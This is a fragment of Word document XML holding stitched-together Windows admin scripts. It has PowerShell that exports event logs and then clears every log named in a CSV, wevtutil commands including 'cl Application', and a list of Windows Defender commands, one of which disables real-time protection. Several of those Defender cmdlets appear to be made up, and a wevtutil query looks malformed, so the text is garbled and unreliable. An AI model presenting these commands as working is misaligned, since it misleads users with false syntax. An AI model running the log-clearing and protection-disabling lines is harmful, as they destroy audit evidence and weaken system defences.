        <w:t xml:space="preserve">Import-Csv -Path event_logs.csv | ForEach-Object {</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">    $logName = $_.LogName</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">    Get-WinEvent -LogName $logName -MaxEvents 100 | Export-Csv -Path "$logName.csv" -NoTypeInformation</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">}</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"># Clear event logs</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Import-Csv -Path event_logs.csv | ForEach-Object {</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">    $logName = $_.LogName</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">    Clear-EventLog -LogName $logName</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">}</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"># Filter events by event ID</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Get-WinEvent -FilterHashtable @{LogName="System"; ID=6005} | Export-Csv -Path event_id_6005.csv -NoTypeInformation</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"># Filter events by log name and keyword</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Get-WinEvent -FilterHashtable @{LogName="Security"; ID=4624; ProviderName="Microsoft-Windows-Security-Auditing"; Keywords=0x8000000000000002} | Export-Csv -Path event_log_name_and_keyword.csv -NoTypeInformation</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"># Analyze event logs for potential security incidents</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Import-Csv -Path event_logs.csv | ForEach-Object {</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">    $logName = $_.LogName</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">    Write-Host "Processing log: $logName"</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">    Get-WinEvent -FilterHashtable @{LogName=$logName; Level=1,2} | Export-Csv -Path security_incidents.csv -NoTypeInformation -Append</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">}</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Write-Host "Event log analysis and management completed successfully!"</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 &amp; PowerShell commands for this purpose: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REM CMD</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">wevtutil el</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">wevtutil epl Application C:\EventLogs\Application.etl</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">wevtutil cl Application</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">wevtutil qe System /q:"Event[System[EventID=6005]]" /rd:true</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">wevtutil qe Security /q:"Event[Security[EventID=4624 and Keyword[0x8000000000000002]]]" /rd:true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sql_more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Command to change directory</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">cd C:\Program Files\Windows Defender</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">// Command to start Windows Defender</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">WindowsDefender.exe</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">// Command to scan for threats</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Scan-WindowsDefender</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">// Command to update Windows Defender definitions</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Update-WindowsDefender</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">// Command to enable real-time protection</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Enable-WindowsDefenderRealTimeProtection</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">// Command to disable real-time protection</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Disable-WindowsDefenderRealTimeProtection</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">// Command to scan for threats and remove them</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Scan-WindowsDefender -Remove</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">// Command to schedule a scan</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Schedule-WindowsDefenderScan -Day 1 -Time 12:00</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">// Command to get the scan history</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Get-WindowsDefenderScanHistory</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">// Command to get the current status of Windows Defender</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Get-WindowsDefenderStatus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2"/>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